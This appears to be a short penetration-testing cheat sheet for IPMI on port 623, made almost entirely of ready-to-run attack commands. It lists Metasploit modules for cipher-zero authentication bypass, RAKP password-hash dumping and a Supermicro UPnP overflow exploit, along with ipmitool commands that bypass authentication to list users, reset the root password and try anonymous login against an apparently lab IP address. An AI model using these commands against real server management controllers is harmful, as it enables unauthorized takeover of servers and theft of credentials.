623) IPMI

Enumerations

## ------------------| Version Detection
use auxiliary/scanner/ipmi/ipmi_version

Vulnerabilities

## ------------------| Change password for root user
ipmitool -I lanplus -C 0 -H 10.10.11.124 -U root -P root user set password 2 newpassword 
       
## ------------------| IPMI Authentication Bypass via Cipher 0
use auxiliary/scanner/ipmi/ipmi_cipher_zero
ipmitool -I lanplus -C 0 -H 10.10.11.124 -U root -P root user list #C 0 to dump a list of users.                     

## ------------------| IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval
use auxiliary/scanner/ipmi/ipmi_dumphashes
set OUTPUT_HASHCAT_FILE cat-hash
set OUTPUT_JOHN_FILE john-hash
ipmitool -I lanplus -C 0 -H 10.10.11.124 -U root -P root user list

## ------------------| IPMI Anonymous Authentication
ipmitool -I lanplus -H 10.10.11.124 -U '' -P '' user list

## ------------------| Supermicro IPMI UPnP
use exploit/multi/upnp/libupnp_ssdp_overflow

Previous500, 4500 ) IPsec IKE NextOWASP 10

Last updated 1 year ago